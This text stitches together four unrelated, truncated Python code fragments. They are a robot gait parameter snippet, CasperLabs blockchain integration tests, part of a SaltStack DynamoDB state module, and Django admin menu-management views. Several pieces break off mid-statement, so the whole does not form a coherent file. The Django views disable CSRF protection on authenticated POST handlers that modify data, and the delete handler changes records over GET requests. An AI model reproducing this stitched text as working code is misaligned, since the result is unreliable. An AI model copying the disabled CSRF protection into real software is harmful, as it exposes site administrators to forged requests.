# paramd_normal = {'K_swp_vel_sag':.0, 'K_swp_vel_cor':.4, 'K_swp_pos_sag':1.5, 'K_swp_pos_cor':0.}
# paramd_normal = {'K_swp_vel_sag':.0, 'K_swp_vel_cor':.25, 'K_swp_pos_sag':1.7, 'K_swp_pos_cor':.3}
paramd_normal = {'K_swp_vel_sag':.0, 'K_swp_vel_cor':.3, 'K_swp_pos_sag':1.8, 'K_swp_pos_cor':.2, 'K_swp_pos_sag_faster':0.}
paramd['right_left_normal'] = paramd_normal
paramd['right_right_normal'] = paramd_normal
paramd['left_left_normal'] = | |
import os
import logging
import pytest
import json
from pathlib import Path
from pytest import fixture, raises
from test.cl_node.contract_address import contract_address
from test.cl_node.common import testing_root_path, HELLO_NAME_CONTRACT
from test.cl_node.casperlabs_accounts import Account, GENESIS_ACCOUNT
from test.cl_node.common import extract_block_hash_from_propose_output
from test.cl_node.docker_node import DockerNode
from test.cl_node.errors import NonZeroExitCodeError
from test.cl_node.wait import wait_for_genesis_block
from casperlabs_client import ABI
from test.cl_node.cli import CLI, DockerCLI, CLIErrorExit
"""
Test account state retrieval with query-state.
Example output of the Scala client:
account {
public_key: "3030303030303030303030303030303030303030303030303030303030303030"
purse_id {
uref: "0000000000000000000000000000000000000000000000000000000000000000"
access_rights: READ_ADD_WRITE
}
associated_keys {
public_key: "3030303030303030303030303030303030303030303030303030303030303030"
weight: 1
}
action_thresholds {
deployment_threshold: 1
key_management_threshold: 1
}
account_activity {
key_management_last_used: 0
deployment_last_used: 0
inactivity_period_limit: 100
}
}
"""
def deploy_and_propose_from_genesis(node, contract):
return node.deploy_and_propose(
session_contract=contract,
payment_contract=contract,
from_address=GENESIS_ACCOUNT.public_key_hex,
public_key=GENESIS_ACCOUNT.public_key_path,
private_key=GENESIS_ACCOUNT.private_key_path,
)
def account_state(node, block_hash, account=GENESIS_ACCOUNT):
return node.d_client.query_state(
block_hash=block_hash, key_type="address", key=account.public_key_hex, path=""
)
def test_account_state(one_node_network):
node = one_node_network.docker_nodes[0]
block_hash = deploy_and_propose_from_genesis(node, "test_counterdefine.wasm")
deploys = node.client.show_deploys(block_hash)
assert not deploys[0].is_error
acct_state = account_state(node, block_hash)
known_urefs = acct_state.account[0].known_urefs
names = [uref.name for uref in known_urefs]
assert "counter" in names
block_hash = deploy_and_propose_from_genesis(node, "test_countercall.wasm")
acct_state = account_state(node, block_hash)
known_urefs = acct_state.account[0].known_urefs
names = [uref.name for uref in known_urefs]
assert "counter" in names
def test_transfer_with_overdraft(one_node_network):
acct1 = Account(1)
acct2 = Account(2)
node: DockerNode = one_node_network.docker_nodes[0]
# Transfer 1000000 from genesis... to acct1...
# For compatibility with EE with no execution cost
# payment_contract="transfer_to_account.wasm"
block_hash = node.transfer_to_account(
to_account_id=1,
amount=1000000,
from_account_id="genesis",
payment_contract="transfer_to_account.wasm",
)
deploys = node.client.show_deploys(block_hash)
assert not deploys[0].is_error, f"error_message: {deploys[0].error_message}"
# Response not used, but assures account exist
_ = account_state(node, block_hash, acct1)
# Should error as account doesn't exist.
with raises(Exception):
_ = account_state(node, block_hash, acct2)
# No API currently exists for getting balance to check transfer.
# Transfer 750000 from acct1... to acct2...
block_hash = node.transfer_to_account(
to_account_id=2,
amount=750000,
from_account_id=1,
payment_contract="transfer_to_account.wasm",
)
deploys = node.client.show_deploys(block_hash)
assert not deploys[0].is_error, f"error_message: {deploys[0].error_message}"
# Response not used, but assures the account exists
_ = account_state(node, block_hash, acct2)
# Transfer 750000000000 from acct1... to acct2...
# Should fail with acct1 overdrawn. Requires assert in contract to generate is_error.
with raises(Exception):
_ = node.transfer_to_account(
to_account_id=2,
amount=750000000000,
from_account_id=1,
payment_contract="transfer_to_account.wasm",
)
def test_transfer_to_accounts(one_node_network):
node: DockerNode = one_node_network.docker_nodes[0]
# Perform multiple transfers with end result of Acct1 = 100, Acct2 = 100, Acct3 = 800
node.transfer_to_accounts([(1, 1000), (2, 900, 1), (3, 800, 2)])
with raises(Exception):
# Acct 1 has not enough funds so it should fail
node.transfer_to_account(
to_account_id=4,
amount=100000000000,
from_account_id=1,
payment_contract="transfer_to_account.wasm",
)
node.transfer_to_account(
to_account_id=4,
amount=100,
from_account_id=2,
payment_contract="transfer_to_account.wasm",
)
# TODO: Improve checks once balance is easy to read.
def balance(node, account_address, block_hash):
try:
return node.client.get_balance(account_address, block_hash)
except Exception:
return 0
def test_scala_client_balance(one_node_network):
node: DockerNode = one_node_network.docker_nodes[0]
accounts = [Account(i) for i in range(1, 4)]
block_hash = list(node.p_client.show_blocks(1))[0].summary.block_hash.hex()
initial = [
balance(node, account.public_key_hex, block_hash) for account in accounts
]
# Perform multiple transfers with end result of Acct1 = 200, Acct2 = 100, Acct3 = 700
hashes = node.transfer_to_accounts([(1, 1000), (2, 800, 1), (3, 700, 2)])
for acct_num, value in ((0, 200), (1, 100), (2, 700)):
addr = accounts[acct_num].public_key_hex
bal = node.d_client.get_balance(account_address=addr, block_hash=hashes[-1])
assert bal == initial[acct_num] + value
ffi_test_contracts = [
("getcallerdefine.wasm", "getcallercall.wasm"),
("listknownurefsdefine.wasm", "listknownurefscall.wasm"),
]
def deploy_and_propose_expect_no_errors(node, contract):
client = node.d_client
block_hash = node.deploy_and_propose(
session_contract=contract,
payment_contract=contract,
from_address=node.genesis_account.public_key_hex,
public_key=node.genesis_account.public_key_path,
private_key=node.genesis_account.private_key_path,
)
r = client.show_deploys(block_hash)[0]
assert r.is_error is False, f"error_message: {r.error_message}"
@pytest.mark.parametrize("define_contract, call_contract", ffi_test_contracts)
def test_get_caller(one_node_network, define_contract, call_contract):
node = one_node_network.docker_nodes[0]
deploy_and_propose_expect_no_errors(node, define_contract)
deploy_and_propose_expect_no_errors(node, call_contract)
@pytest.mark.parametrize("wasm", [HELLO_NAME_CONTRACT, "old_wasm/test_helloname.wasm"])
def test_multiple_propose(one_node_network, wasm):
"""
Feature file: propose.feature
Scenario: Single node deploy and multiple propose generates an Exception.
OP-182: First propose should be success, and subsequent propose calls should throw an error/exception.
"""
node = one_node_network.docker_nodes[0]
deploy_and_propose_from_genesis(node, wasm)
number_of_blocks = node.client.get_blocks_count(100)
try:
_ = node.client.propose()
assert False, "Second propose must not succeed, should throw"
except NonZeroExitCodeError as e:
assert e.exit_code == 1, "Second propose should fail"
wait_for_genesis_block(node)
# Number of blocks after second propose should not change
assert node.client.get_blocks_count(100) == number_of_blocks
# Examples of query-state executed with the Scala client that result in errors:
# CasperLabs/docker $ ./client.sh node-0 propose
# Response: Success! Block 9d38836598... created and added.
# CasperLabs/docker $ ./client.sh node-0 query-state --block-hash '"9d"' --key '"a91208047c"' --path file.xxx --type hash
# NOT_FOUND: Cannot find block matching hash "9d"
# CasperLabs/docker$ ./client.sh node-0 query-state --block-hash 9d --key '"a91208047c"' --path file.xxx --type hash
# INVALID_ARGUMENT: Key of type hash must have exactly 32 bytes, 5 =/= 32 provided.
# CasperLabs/docker$ ./client.sh node-0 query-state --block-hash 9d --key 3030303030303030303030303030303030303030303030303030303030303030 --path file.xxx --type hash
# INVALID_ARGUMENT: Value not found: " Hash([48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48, 48])"
@pytest.fixture() # scope="module")
def node(one_node_network):
return one_node_network.docker_nodes[0]
@pytest.fixture() # (scope="module")
def client(node):
return node.d_client
@pytest.fixture() # (scope="module")
def block_hash(node):
return node.deploy_and_propose(
session_contract="test_helloname.wasm", payment_contract="test_helloname.wasm"
)
block_hash_queries = [
(
{
"block_hash": "9d000000",
"key": "a91208047c",
"path": "file.xxx",
"key_type": "hash",
},
"NOT_FOUND: Cannot find block matching",
),
(
{"key": "a91208047c", "path": "file.xxx", "key_type": "hash"},
"INVALID_ARGUMENT: Key of type hash must have exactly 32 bytes",
),
({"path": "file.xxx", "key_type": "hash"}, "INVALID_ARGUMENT: Value not found"),
]
@pytest.mark.parametrize("query, expected", block_hash_queries)
def test_query_state_error(node, client, block_hash, query, expected):
if "block_hash" not in query:
query["block_hash"] = block_hash
if "key" not in query:
query["key"] = GENESIS_ACCOUNT.public_key_hex
with pytest.raises(NonZeroExitCodeError) as excinfo:
_ = client.query_state(**query)
assert expected in excinfo.value.output
def test_revert_subcall(client, node):
# This contract calls another contract that calls revert(2)
block_hash = deploy_and_propose_from_genesis(
node, "test_subcall_revert_define.wasm"
)
r = client.show_deploys(block_hash)[0]
assert not r.is_error
assert r.error_message == ""
deploy_hash = r.deploy.deploy_hash
r = client.show_deploy(deploy_hash)
assert r.deploy.deploy_hash == deploy_hash
block_hash = deploy_and_propose_from_genesis(node, "test_subcall_revert_call.wasm")
r = client.show_deploys(block_hash)[0]
assert r.is_error
assert r.error_message == "Exit code: 2"
def test_revert_direct(client, node):
# This contract calls revert(1) directly
block_hash = deploy_and_propose_from_genesis(node, "test_direct_revert_call.wasm")
r = client.show_deploys(block_hash)[0]
assert r.is_error
assert r.error_message == "Exit code: 1"
def test_deploy_with_valid_signature(one_node_network):
"""
Feature file: deploy.feature
Scenario: Deploy with valid signature
"""
node0 = one_node_network.docker_nodes[0]
block_hash = deploy_and_propose_from_genesis(node0, "test_helloname.wasm")
deploys = node0.client.show_deploys(block_hash)
assert deploys[0].is_error is False
def test_deploy_with_invalid_signature(one_node_network):
"""
Feature file: deploy.feature
Scenario: Deploy with invalid signature
"""
node0 = one_node_network.docker_nodes[0]
with pytest.raises(NonZeroExitCodeError):
node0.client.deploy(
from_address=GENESIS_ACCOUNT.public_key_hex,
session_contract="test_helloname.wasm",
payment_contract="test_helloname.wasm",
private_key="validator-0-private-invalid.pem",
public_key="validator-0-public-invalid.pem",
)
"""
Feature file: ~/CasperLabs/integration-testing/features/deploy.feature
"""
def deploy_and_propose(node, contract):
node.client.deploy(
session_contract=contract,
payment_contract=contract,
from_address=GENESIS_ACCOUNT.public_key_hex,
public_key=GENESIS_ACCOUNT.public_key_path,
private_key=GENESIS_ACCOUNT.private_key_path,
)
return extract_block_hash_from_propose_output(node.client.propose())
def deploy(node, contract):
message = node.client.deploy(
from_address=GENESIS_ACCOUNT.public_key_hex,
public_key=GENESIS_ACCOUNT.public_key_path,
private_key=GENESIS_ACCOUNT.private_key_path,
session_contract=contract,
payment_contract=contract,
)
assert "Success!" in message
return message.split()[2]
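# Note: message.split()[2] assumes the deploy hash is the third whitespace-separated
# token of the client's success message (message format assumed, not verified here).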
def propose(node):
return extract_block_hash_from_propose_output(node.client.propose())
def deploy_hashes(node, block_hash):
return set(d.deploy.deploy_hash for d in node.client.show_deploys(block_hash))
# Python Client (library)
# fmt: off
def resource(fn):
cur_path = Path(os.path.realpath(__file__)).parent
while cur_path.name != "integration-testing":
cur_path = cur_path.parent
return cur_path / "resources" / fn
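# e.g. resource("test_helloname.wasm") resolves to
# <repo>/integration-testing/resources/test_helloname.wasm, per the loop above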
def test_args_parser():
account = (
b"\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x00\x08"
b"\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07"
)
amount = 123456
args = [{"name": "amount", "value": {"long_value": amount}},
{"name": "account", "value": {"bytes_value": account.hex()}},
{"name": "purse_id", "value": {"optional_value": {}}},
{"name": "number", "value": {"big_int": {"value": "2", "bit_width": 512}}}]
json_str = json.dumps(args)
assert ABI.args_from_json(json_str) == ABI.args(
[ABI.long_value(amount), ABI.account(account), ABI.optional_value(None), ABI.big_int(2)]
)
@fixture()
def genesis_public_signing_key():
with GENESIS_ACCOUNT.public_key_binary_file() as f:
yield f
def test_deploy_with_args(one_node_network, genesis_public_signing_key):
"""
Deploys test contracts that do:
revert(get_arg(0)); // for u32 and u512
and
revert(sum(address_bytes[u8; 32]) + u32); for multiple argument test.
Tests args get correctly encoded and decoded in the contract.
Test expects the test contracts test_args_u32.wasm and test_args_u512.wasm
to deserialize correctly their arguments and then call revert with value
of the argument (converted to a Rust native int, as expected by revert).
If the test contracts don't fail or if their exit code differs from the
expected one, the test will fail.
"""
node = one_node_network.docker_nodes[0]
client = node.p_client.client
for wasm, encode in [
(resource("test_args_u32.wasm"), ABI.u32),
(resource("test_args_u512.wasm"), ABI.u512),
]:
for number in [1, 12, 256, 1024]:
response, deploy_hash = client.deploy(
payment=wasm,
session=wasm,
public_key=resource("accounts/account-public-genesis.pem"),
private_key=resource("accounts/account-private-genesis.pem"),
session_args=ABI.args([encode(number)]),
)
logging.info(
f"DEPLOY RESPONSE: {response} deploy_hash: {deploy_hash.hex()}"
)
response = client.propose()
# Need to convert to hex string from bytes
block_hash = response.block_hash.hex()
for deploy_info in client.showDeploys(block_hash):
assert deploy_info.is_error is True
assert deploy_info.error_message == f"Exit code: {number}"
wasm = resource("test_args_multi.wasm")
account_hex = "0101010102020202030303030404040405050505060606060707070708080808"
number = 1000
total_sum = sum([1, 2, 3, 4, 5, 6, 7, 8]) * 4 + number
response, deploy_hash = client.deploy(
payment=wasm,
session=wasm,
public_key=resource("accounts/account-public-genesis.pem"),
private_key=resource("accounts/account-private-genesis.pem"),
session_args=ABI.args(
[ABI.account(bytes.fromhex(account_hex)), ABI.u32(number)]
),
)
logging.info(f"DEPLOY RESPONSE: {response} deploy_hash: {deploy_hash.hex()}")
response = client.propose()
block_hash = response.block_hash.hex()
for deploy_info in client.showDeploys(block_hash):
assert deploy_info.is_error is True
assert deploy_info.error_message == f"Exit code: {total_sum}"
for blockInfo in client.showBlocks(10):
assert blockInfo.status.stats.block_size_bytes > 0
# Python CLI #
@pytest.fixture() # scope="module")
def cli(one_node_network):
return CLI(one_node_network.docker_nodes[0], "casperlabs_client")
@pytest.fixture() # scope="module")
def scala_cli(one_node_network):
return DockerCLI(one_node_network.docker_nodes[0])
def test_cli_no_parameters(cli):
with raises(CLIErrorExit) as | |
"""
Manage DynamoDB Tables
======================
.. versionadded:: 2015.5.0
Create and destroy DynamoDB tables. Be aware that this interacts with Amazon's
services, and so may incur charges.
This module uses ``boto``, which can be installed via package, or pip.
This module accepts explicit DynamoDB credentials but can also utilize
IAM roles assigned to the instance through Instance Profiles. Dynamic
credentials are then automatically obtained from AWS API and no further
configuration is necessary. More information available `here
<http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html>`_.
If IAM roles are not used you need to specify them either in a pillar file or
in the minion's config file:
.. code-block:: yaml
keyid: <KEY>
key: <KEY>
region: us-east-1
It's also possible to specify ``key``, ``keyid`` and ``region`` via a
profile, either passed in as a dict, or as a string to pull from
pillars or minion config:
.. code-block:: yaml
myprofile:
keyid: <KEY>
key: <KEY>
region: us-east-1
.. code-block:: yaml
Ensure DynamoDB table does not exist:
boto_dynamodb.absent:
- table_name: new_table
- keyid: <KEY>
- key: <KEY>
- region: us-east-1
Ensure DynamoDB table exists:
boto_dynamodb.present:
- table_name: new_table
- read_capacity_units: 1
- write_capacity_units: 2
- hash_key: primary_id
- hash_key_data_type: N
- range_key: start_timestamp
- range_key_data_type: N
- keyid: <KEY>
- key: <KEY>
- region: us-east-1
- local_indexes:
- index:
- name: "primary_id_end_timestamp_index"
- hash_key: primary_id
- hash_key_data_type: N
- range_key: end_timestamp
- range_key_data_type: N
- global_indexes:
- index:
- name: "name_end_timestamp_index"
- hash_key: name
- hash_key_data_type: S
- range_key: end_timestamp
- range_key_data_type: N
- read_capacity_units: 3
- write_capacity_units: 4
It's possible to specify cloudwatch alarms that will be setup along with the
DynamoDB table. Note the alarm name will be defined by the name attribute
provided, plus the DynamoDB resource name.
.. code-block:: yaml
Ensure DynamoDB table exists:
boto_dynamodb.present:
- name: new_table
- read_capacity_units: 1
- write_capacity_units: 2
- hash_key: primary_id
- hash_key_data_type: N
- range_key: start_timestamp
- range_key_data_type: N
- alarms:
ConsumedWriteCapacityUnits:
name: 'DynamoDB ConsumedWriteCapacityUnits **MANAGED BY SALT**'
attributes:
metric: ConsumedWriteCapacityUnits
namespace: AWS/DynamoDB
statistic: Sum
comparison: '>='
# threshold_percent is used to calculate the actual threshold
# based on the provisioned capacity for the table.
threshold_percent: 0.75
period: 300
evaluation_periods: 2
unit: Count
description: 'DynamoDB ConsumedWriteCapacityUnits'
alarm_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
insufficient_data_actions: []
ok_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
- keyid: <KEY>
- key: <KEY>
- region: us-east-1
You can also use alarms from pillars, and override values from the pillar
alarms by setting overrides on the resource. Note that if defined,
'boto_dynamodb_alarms' is used as a default for all resources, which makes it
easy to ensure alarms are always set for a resource.
Setting the alarms in a pillar:
.. code-block:: yaml
boto_dynamodb_alarms:
ConsumedWriteCapacityUnits:
name: 'DynamoDB ConsumedWriteCapacityUnits **MANAGED BY SALT**'
attributes:
metric: ConsumedWriteCapacityUnits
namespace: AWS/DynamoDB
statistic: Sum
comparison: '>='
# threshold_percent is used to calculate the actual threshold
# based on the provisioned capacity for the table.
threshold_percent: 0.75
period: 300
evaluation_periods: 2
unit: Count
description: 'DynamoDB ConsumedWriteCapacityUnits'
alarm_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
insufficient_data_actions: []
ok_actions: [ 'arn:aws:sns:us-east-1:1234:my-alarm' ]
Ensure DynamoDB table exists:
boto_dynamodb.present:
- name: new_table
- read_capacity_units: 1
- write_capacity_units: 2
- hash_key: primary_id
- hash_key_data_type: N
- range_key: start_timestamp
- range_key_data_type: N
- alarms:
ConsumedWriteCapacityUnits:
attributes:
threshold_percent: 0.90
period: 900
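Here the pillar alarm supplies the metric, statistic, actions and remaining
attributes, while the resource-level override raises the threshold to 90% and
widens the evaluation period to 900 seconds.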
"""
import copy
import datetime
import logging
import math
import sys
import salt.utils.dictupdate as dictupdate
from salt.ext import six
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(name)s %(levelname)s %(message)s",
stream=sys.stdout,
)
log = logging.getLogger()
class GsiNotUpdatableError(Exception):
"""Raised when a global secondary index cannot be updated."""
def __virtual__():
"""
Only load if boto_dynamodb is available.
"""
if "boto_dynamodb.exists" in __salt__:
return "boto_dynamodb"
return (False, "boto_dynamodb module could not be loaded")
def present(
name=None,
table_name=None,
region=None,
key=None,
keyid=None,
profile=None,
read_capacity_units=None,
write_capacity_units=None,
alarms=None,
alarms_from_pillar="boto_dynamodb_alarms",
hash_key=None,
hash_key_data_type=None,
range_key=None,
range_key_data_type=None,
local_indexes=None,
global_indexes=None,
backup_configs_from_pillars="boto_dynamodb_backup_configs",
):
"""
Ensure the DynamoDB table exists. Table throughput can be updated after
table creation.
Global secondary indexes (GSIs) are managed with some exceptions:
- If a GSI deletion is detected, a failure will occur (deletes should be
done manually in the AWS console).
- If multiple GSIs are added in a single Salt call, a failure will occur
(boto supports one creation at a time). Note that this only applies after
table creation; multiple GSIs can be created during table creation.
- Updates to existing GSIs are limited to read/write capacity only
(DynamoDB limitation).
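For example, a state that adds two new GSIs to an already-created table must be
split across two separate runs, one index per run.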
name
Name of the DynamoDB table
table_name
Name of the DynamoDB table (deprecated)
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string)
that contains a dict with region, key and keyid.
read_capacity_units
The read throughput for this table
write_capacity_units
The write throughput for this table
hash_key
The name of the attribute that will be used as the hash key
for this table
hash_key_data_type
The DynamoDB datatype of the hash key
range_key
The name of the attribute that will be used as the range key
for this table
range_key_data_type
The DynamoDB datatype of the range key
local_indexes
The local indexes you would like to create
global_indexes
The global indexes you would like to create
backup_configs_from_pillars
Pillars to use to configure DataPipeline backups
"""
ret = {"name": name, "result": True, "comment": "", "changes": {}}
if table_name:
ret["warnings"] = [
"boto_dynamodb.present: `table_name` is deprecated." " Please use `name` instead."
]
ret["name"] = table_name
name = table_name
comments = []
changes_old = {}
changes_new = {}
# Ensure DynamoDB table exists
table_exists = __salt__["boto_dynamodb.exists"](name, region, key, keyid, profile)
if not table_exists:
if __opts__["test"]:
ret["result"] = None
ret["comment"] = "DynamoDB table {} would be created.".format(name)
return ret
else:
is_created = __salt__["boto_dynamodb.create_table"](
name,
region,
key,
keyid,
profile,
read_capacity_units,
write_capacity_units,
hash_key,
hash_key_data_type,
range_key,
range_key_data_type,
local_indexes,
global_indexes,
)
if not is_created:
ret["result"] = False
ret["comment"] = "Failed to create table {}".format(name)
_add_changes(ret, changes_old, changes_new)
return ret
comments.append("DynamoDB table {} was successfully created".format(name))
changes_new["table"] = name
changes_new["read_capacity_units"] = read_capacity_units
changes_new["write_capacity_units"] = write_capacity_units
changes_new["hash_key"] = hash_key
changes_new["hash_key_data_type"] = hash_key_data_type
changes_new["range_key"] = range_key
changes_new["range_key_data_type"] = range_key_data_type
changes_new["local_indexes"] = local_indexes
changes_new["global_indexes"] = global_indexes
else:
comments.append("DynamoDB table {} exists".format(name))
# Ensure DynamoDB table provisioned throughput matches
description = __salt__["boto_dynamodb.describe"](name, region, key, keyid, profile)
provisioned_throughput = description.get("Table", {}).get("ProvisionedThroughput", {})
current_write_capacity_units = provisioned_throughput.get("WriteCapacityUnits")
current_read_capacity_units = provisioned_throughput.get("ReadCapacityUnits")
throughput_matches = (
current_write_capacity_units == write_capacity_units
and current_read_capacity_units == read_capacity_units
)
if not throughput_matches:
if __opts__["test"]:
ret["result"] = None
comments.append("DynamoDB table {} is set to be updated.".format(name))
else:
is_updated = __salt__["boto_dynamodb.update"](
name,
throughput={
"read": read_capacity_units,
"write": write_capacity_units,
},
region=region,
key=key,
keyid=keyid,
profile=profile,
)
if not is_updated:
ret["result"] = False
ret["comment"] = "Failed to update table {}".format(name)
_add_changes(ret, changes_old, changes_new)
return ret
comments.append("DynamoDB table {} was successfully updated".format(name))
changes_old["read_capacity_units"] = (current_read_capacity_units,)
changes_old["write_capacity_units"] = (current_write_capacity_units,)
changes_new["read_capacity_units"] = (read_capacity_units,)
changes_new["write_capacity_units"] = (write_capacity_units,)
else:
comments.append("DynamoDB table {} throughput matches".format(name))
provisioned_indexes = description.get("Table", {}).get("GlobalSecondaryIndexes", [])
_ret = _global_indexes_present(
provisioned_indexes,
global_indexes,
changes_old,
changes_new,
comments,
name,
region,
key,
keyid,
profile,
)
if not _ret["result"]:
comments.append(_ret["comment"])
ret["result"] = _ret["result"]
if ret["result"] is False:
ret["comment"] = ",\n".join(comments)
_add_changes(ret, changes_old, changes_new)
return ret
_ret = _alarms_present(
name,
alarms,
alarms_from_pillar,
write_capacity_units,
read_capacity_units,
region,
key,
keyid,
profile,
)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
comments.append(_ret["comment"])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
ret["comment"] = ",\n".join(comments)
_add_changes(ret, changes_old, changes_new)
return ret
# Ensure backup datapipeline is present
datapipeline_configs = copy.deepcopy(__salt__["pillar.get"](backup_configs_from_pillars, []))
for config in datapipeline_configs:
datapipeline_ret = _ensure_backup_datapipeline_present(
name=name,
schedule_name=config["name"],
period=config["period"],
utc_hour=config["utc_hour"],
s3_base_location=config["s3_base_location"],
)
# Add comments and changes if successful changes were made (True for live mode,
# None for test mode).
if datapipeline_ret["result"] in [True, None]:
ret["result"] = datapipeline_ret["result"]
comments.append(datapipeline_ret["comment"])
if datapipeline_ret.get("changes"):
ret["changes"]["backup_datapipeline_{}".format(config["name"])] = (
datapipeline_ret.get("changes"),
)
else:
ret["comment"] = ",\n".join([ret["comment"], datapipeline_ret["comment"]])
_add_changes(ret, changes_old, changes_new)
return ret
ret["comment"] = ",\n".join(comments)
_add_changes(ret, changes_old, changes_new)
return ret
def _add_changes(ret, changes_old, changes_new):
if changes_old:
ret["changes"]["old"] = changes_old
if changes_new:
ret["changes"]["new"] = changes_new
def _global_indexes_present(
provisioned_indexes,
global_indexes,
changes_old,
changes_new,
comments,
name,
region,
key,
keyid,
profile,
):
"""Handles global secondary index for the table present state."""
ret = {"result": True}
if provisioned_indexes:
provisioned_gsi_config = {index["IndexName"]: index for index in provisioned_indexes}
else:
provisioned_gsi_config = {}
provisioned_index_names = set(provisioned_gsi_config.keys())
# Map of index name to given Salt config for this run. This loop is complicated
# because global_indexes is made up of OrderedDicts and lists.
import time
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_http_methods
from django.utils.decorators import method_decorator
from backstage.models import SmAdminMenu, IndexInfo, CarouselDisplay, NewsInfo, ContactInfo, ColumnListsInfo
from core.session.ManageSession import getheader_info
@login_required
def header_index(request):
"""
Admin home page (header) management view.
:param request: query string carries the result banner, h=success&i=v1
:return:
"""
h = request.GET.get("h", "")
i = request.GET.get("i", "")
info = {}
if h == "success" and i != "":
info["s"] = True
info["e"] = False
info["info"] = "修改成功!"
elif h == "error" and i != "":
info["s"] = False
info["e"] = True
info["info"] = "修改失敗!"
else:
info["s"] = False
info["e"] = False
header_info = getheader_info(request)
adminMenuList = {}
for parent_id in range(1, 8):
smAdminMenu = SmAdminMenu.objects.filter(parent_id=parent_id).order_by('menu_order')
adminMenuList["menu_" + str(parent_id)] = smAdminMenu
print(adminMenuList)
URL_Info = IndexInfo.objects.all()  # page/link records shown on the home page
Carousel_Info = CarouselDisplay.objects.all().order_by('carousel_nub')  # carousel slides in display order
News_Info = NewsInfo.objects.all()  # news entries
Contact_Info = ContactInfo.objects.all()  # contact entries
return render(request, "backstage/userauth/pagefile/page/header-index.html",
{"header_info": header_info, "adminMenuList": adminMenuList, "info": info, "URL_Info": URL_Info,
"Carousel_Info": Carousel_Info, "News_Info": News_Info, "Contact_Info": Contact_Info})
@login_required
def footer_index(request):
"""
Admin home page (footer) management view.
:param request: query string carries the result banner, h=success&i=v1
:return:
"""
h = request.GET.get("h", "")
i = request.GET.get("i", "")
info = {}
if h == "success" and i != "":
info["s"] = True
info["e"] = False
info["info"] = "修改成功!"
elif h == "error" and i != "":
info["s"] = False
info["e"] = True
info["info"] = "修改失敗!"
else:
info["s"] = False
info["e"] = False
header_info = getheader_info(request)
adminMenuList = {}
for parent_id in range(1, 8):
smAdminMenu = SmAdminMenu.objects.filter(parent_id=parent_id).order_by('menu_order')
adminMenuList["menu_" + str(parent_id)] = smAdminMenu
print(adminMenuList)
column_lists = ColumnListsInfo.objects.all().order_by('column_lists_nub')  # footer column entries in display order
return render(request, "backstage/userauth/pagefile/page/foot-index.html",
{"header_info": header_info, "adminMenuList": adminMenuList, "info": info,
"column_lists": column_lists})
@login_required
@csrf_exempt
@require_http_methods(["POST"])
def add_menu(request):
"""
Append a new entry to the selected top-level menu.
:param request:
:return:
"""
menu = request.GET.get("menu")
menu_name = request.POST.get("menu_name", "")
menu_url = request.POST.get("menu_url", "")
menu_ft = request.POST.get("menu_ft", "")
menu_jt = request.POST.get("menu_jt", "")
menu_yw = request.POST.get("menu_yw", "")
menu_fw = request.POST.get("menu_fw", "")
menu_xby = request.POST.get("menu_xby", "")
menu_pty = request.POST.get("menu_pty", "")
print("POST不打開", menu, menu_name, menu_url)
sm_nub = SmAdminMenu.objects.filter(parent_id=menu).count()
SmAdminMenu.objects.create(parent_id=menu, menu_mc=menu_name, menu_order=sm_nub + 1, url=menu_url,
nenu_names_zh_hant=menu_ft, nenu_names_zh_hans=menu_jt, nenu_names_en=menu_yw,
nenu_names_fr=menu_fw, nenu_names_pt=menu_xby, nenu_names_es=menu_pty)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
def del_menu(request):
"""
Delete a menu entry and renumber the remaining entries to close the gap.
:param request:
:return:
"""
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
menu_count = SmAdminMenu.objects.filter(parent_id=menu).count()
SmAdminMenu.objects.filter(parent_id=menu, menu_order=menu_order).delete()
print(menu_order, menu_count)
for nub in range(int(menu_order), menu_count + 1):
print(menu_order, menu_count)
SmAdminMenu.objects.filter(parent_id=menu, menu_order=nub).update(menu_order=nub - 1)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@method_decorator(login_required, name="dispatch")
class change_menu(View):
def get(self, request):
header_info = getheader_info(request)
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
smAdminMenu = SmAdminMenu.objects.get(parent_id=menu, menu_order=menu_order)
print(smAdminMenu)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/change-menu.html",
{"header_info": header_info, "smAdminMenu": smAdminMenu})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
menu_name = request.POST.get("menu_name", "")
menu_url = request.POST.get("menu_url", "")
menu_ft = request.POST.get("menu_ft", "")
menu_jt = request.POST.get("menu_jt", "")
menu_yw = request.POST.get("menu_yw", "")
menu_fw = request.POST.get("menu_fw", "")
menu_xby = request.POST.get("menu_xby", "")
menu_pty = request.POST.get("menu_pty", "")
print("POST不打開", menu, menu_order, menu_name, menu_url)
SmAdminMenu.objects.filter(parent_id=menu, menu_order=menu_order).update(menu_mc=menu_name,
url=menu_url,
nenu_names_zh_hant=menu_ft,
nenu_names_zh_hans=menu_jt,
nenu_names_en=menu_yw,
nenu_names_fr=menu_fw,
nenu_names_pt=menu_xby,
nenu_names_es=menu_pty)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
def change_menu_add(request):
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
sm_nub = SmAdminMenu.objects.filter(parent_id=menu).count()
if int(menu_order) >= sm_nub:
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=error&i=v1")
